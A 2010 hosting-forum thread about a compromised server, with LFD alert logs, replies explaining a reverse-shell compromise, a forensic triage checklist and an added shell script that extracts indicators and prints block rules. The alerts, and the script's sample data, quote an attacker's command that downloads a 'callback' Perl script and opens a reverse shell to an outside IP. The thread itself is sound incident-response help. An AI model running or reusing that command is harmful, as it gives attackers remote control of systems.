The Community Forums


Exploit on my server

Discussion in 'Security' started by Parcye, May 4, 2010.

  1. Parcye

    Parcye Well-Known Member

    Joined:
    May 19, 2004
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Eindhoven
    Hi

    I have just opened my mailbox and see loads of warning mails.

    For example:
    Code:
    Time:    Tue May  4 21:38:53 2010 +0200
    PID:     30804
    Account: nobody
    Uptime:  115 seconds
    
    
    Executable:
    
    /bin/bash
    
    
    Command Line (often faked in exploits):
    
    sh -c cd /tmp/;wget davemorar.angelfire.com/callback;perl callback 188.24.6.161 80
    
    
    Network connections by the process (if any):
    Code:
    Time:    Tue May  4 21:38:53 2010 +0200
    PID:     30813
    Account: nobody
    Uptime:  114 seconds
    
    
    Executable:
    
    /bin/bash
    
    
    Command Line (often faked in exploits):
    
    /bin/sh
    
    
    Network connections by the process (if any):
    Code:
    Time:   Tue May  4 21:37:24 2010 +0200
    File:   /tmp/expls/linux-sendpage
    Reason: Binary executable
    Owner:  nobody:nobody
    Action: No action taken
    I feel like panicking!
     

    Attached Files:

    #1 Parcye, May 4, 2010
    Last edited: May 4, 2010
  2. thobarn

    thobarn Well-Known Member

    Joined:
    Apr 25, 2008
    Messages:
    153
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    sanctum sanctorum
    This gave a reverse shell to 188.24.6.161 using some "utility" left online by davemorar.angelfire.com.

    The file you attached is a pretty recent exploit that can be used to elevate privileges to root (if one already has access).

    So at some point someone had access to the machine which was later elevated to root. It is safe to assume that your machine is under the control of someone from Romania by now.

    The best thing to do would be to take it off the net ASAP and rebuild from scratch if that is doable. If you cannot take it offline for any reason I would recommend getting someone who knows what s/he is doing to clean it. Good luck.
     
    #2 thobarn, May 4, 2010
    Last edited: May 4, 2010
  3. Parcye

    Parcye Well-Known Member

    Joined:
    May 19, 2004
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Eindhoven
    Well as soon as I got these mails I blocked those IPs and got some action going. What symptoms would a taken-over server show? What are the signs I should see?
     
  4. thobarn

    thobarn Well-Known Member

    Joined:
    Apr 25, 2008
    Messages:
    153
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    sanctum sanctorum
    If s/he is good there will be no symptoms or signs. I am not qualified to give you an answer so do take what I say with a pinch of salt and seek professional help.

    What you do next depends on what you have on your server. The biggest problem is that any tools you will be using may have been replaced so you cannot trust any output you get. That said:

    Verify package integrity, paying particular attention to /bin /sbin /usr
    Code:
    rpm -Va
    Also list installs in chronological order to see if there is an unexpected update/install
    Code:
    rpm -qa --last
    Check logs /var/log, bash_history...or whatever you have.
    Find recently modified files
    Code:
    ls -lat /
    find / -mtime -3 -ls
    Get a list of processes running to see if there is anything that should not be there, using unlinked files etc
    Code:
    ps aux
    lsof -i
    lsof +L1
    Get a list of network connections
    Code:
    netstat -nap
    lsof | grep ESTABLISHED
    lsof | grep LISTEN
    Check hosts file and DNS settings
    Code:
    cat /etc/hosts
    cat /etc/resolv.conf
    Check latest events
    Code:
    last
    lastlog
    Check users
    Code:
    cat /etc/passwd 
    Check auto starts
    Code:
    chkconfig --list
    Check scheduled jobs
    Code:
    crontab -u root -l
    cat /etc/crontab
    ls /etc/cron.*
    Consider running tripwire, chkrootkit, aide

    Depending on what you find, then you can drill more.

    Preserve any information you find and report the crime locally, and to the intruder's ISP once you complete your investigation, even if you think it won't be followed up.

    HTH. Good luck.

    edited to add: If you did not already, remove /tmp/callback (and /tmp/expls/) after making a note of date and time. The timestamp of those will give you a good reference point to start
     
    #4 thobarn, May 5, 2010
    Last edited: May 5, 2010
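An added example, not code from the original thread or from cPanel/CSF: a few POSIX shell helpers that turn the LFD alert text quoted in post #1 and the checklist from post #4 into something repeatable. The two sample alert bodies are constructed from the alerts in the thread; the firewall commands are printed rather than run. csf -d and the iptables syntax are the real tools; the function names, the check list layout and the output-file naming are this example's own choices.

```shell
#!/bin/sh
# Added example, not from the original thread: helpers for the LFD alerts in
# post #1 and the triage checklist in post #4. Sample alert bodies below are
# constructed from the alerts quoted in the thread.

SAMPLE_PROCESS_ALERT='Time:    Tue May  4 21:38:53 2010 +0200
PID:     30804
Account: nobody
Uptime:  115 seconds

Executable:

/bin/bash

Command Line (often faked in exploits):

sh -c cd /tmp/;wget davemorar.angelfire.com/callback;perl callback 188.24.6.161 80
'

SAMPLE_FILE_ALERT='Time:   Tue May  4 21:37:24 2010 +0200
File:   /tmp/expls/linux-sendpage
Reason: Binary executable
Owner:  nobody:nobody
Action: No action taken
'

# extract_iocs ALERT_TEXT
# Prints the indicators in an alert body, one per line: "ip ..." for the
# callback address, "url ..." for the download, "path ..." for dropped files.
extract_iocs() {
  printf '%s\n' "$1" | awk '
    /^File:/ { print "path " $2; next }
    /^Command Line/ { incmd = 1; next }
    incmd && NF {
      n = split($0, tok, /[; \t]+/)    # tokens of the (possibly faked) command line
      for (i = 1; i <= n; i++) {
        t = tok[i]
        if (t ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/)
          print "ip " t
        else if (t ~ /^(https?:\/\/)?[A-Za-z0-9.-]+\.[A-Za-z][A-Za-z]+\/.+/)
          print "url " t
        else if (t ~ /^\/(tmp|var\/tmp|dev\/shm)\/.+/)
          print "path " t
      }
      incmd = 0
    }' | sort -u
}

# block_rules ALERT_TEXT
# Prints (does not run) firewall commands for each IP found. The shell in the
# alert connects *out* to 188.24.6.161:80, so the OUTPUT rule is the one that
# actually stops the callback; an inbound-only block does nothing against it.
block_rules() {
  extract_iocs "$1" | awk '$1 == "ip" { print $2 }' | while read -r ip; do
    echo "csf -d $ip 'reverse shell callback seen in LFD alert'"
    echo "iptables -I INPUT  -s $ip -j DROP"
    echo "iptables -I OUTPUT -d $ip -j DROP"
  done
}

# The checklist from post #4 as "name|command" lines. tool_hashes comes first:
# compare it against a clean install of the same package versions before you
# trust anything the other commands print (the post's caveat applies here too).
TRIAGE_CHECKS='
tool_hashes|sha256sum /bin/ps /bin/ls /bin/netstat /usr/bin/lsof /usr/bin/find /bin/login
rpm_verify|rpm -Va
rpm_history|rpm -qa --last
recent_files|find / -xdev -mtime -3 -ls
processes|ps auxww
deleted_open_files|lsof +L1
net_by_process|lsof -nP -i
connections|netstat -nap
resolver|cat /etc/hosts /etc/resolv.conf
logins|last -a; lastlog
users|cat /etc/passwd
services|chkconfig --list
root_cron|crontab -u root -l
cron_files|cat /etc/crontab; ls -la /etc/cron.*
'

# run_checks OUTDIR
# One output file per check; missing tools are recorded as skipped and non-zero
# exits are noted, nothing aborts. Copy OUTDIR off the box before cleaning up.
run_checks() {
  out="$1"
  mkdir -p "$out"
  printf '%s\n' "$TRIAGE_CHECKS" | while IFS='|' read -r name cmd; do
    [ -n "$name" ] || continue
    tool=${cmd%% *}
    if ! command -v "$tool" >/dev/null 2>&1; then
      echo "skipped: $tool not installed" > "$out/$name.txt"
      continue
    fi
    sh -c "$cmd" > "$out/$name.txt" 2>&1 ||
      echo "[exit status $?]" >> "$out/$name.txt"
  done
}
```

Run it as root with the checklist tools taken from known-good media where possible (the same warning the post gives: a replaced ps, netstat or lsof will lie to this script exactly as it lies to you), then compare tool_hashes.txt with a clean box before reading the rest.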
  5. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    Well you are actually telling Parcye all the right things here ...

    I fully agree this user has likely been rooted and it is reasonable to assume there are other exploits and backdoors at this point.

    This is a very complex issue and though there would be a lot of signs for a professional like myself observing the server, chances are you would not be aware of anything happening at all whatsoever other than perhaps a bit higher loads with most activity going on behind the scenes and wouldn't be overly apparent to most average server users.

    Once access is gained to a server, a hacker has two primary objectives and that is to cover the trail of anything that might expose them and create secondary backup methods of access to the server. These things usually come first before anything else they might choose to do.

    The entire server needs to be analyzed, checksums compared on system binaries, exploits removed, security hardened and very likely the underlying system rebuilt if there are any remaining doubts as to its status regarding the server's security.
     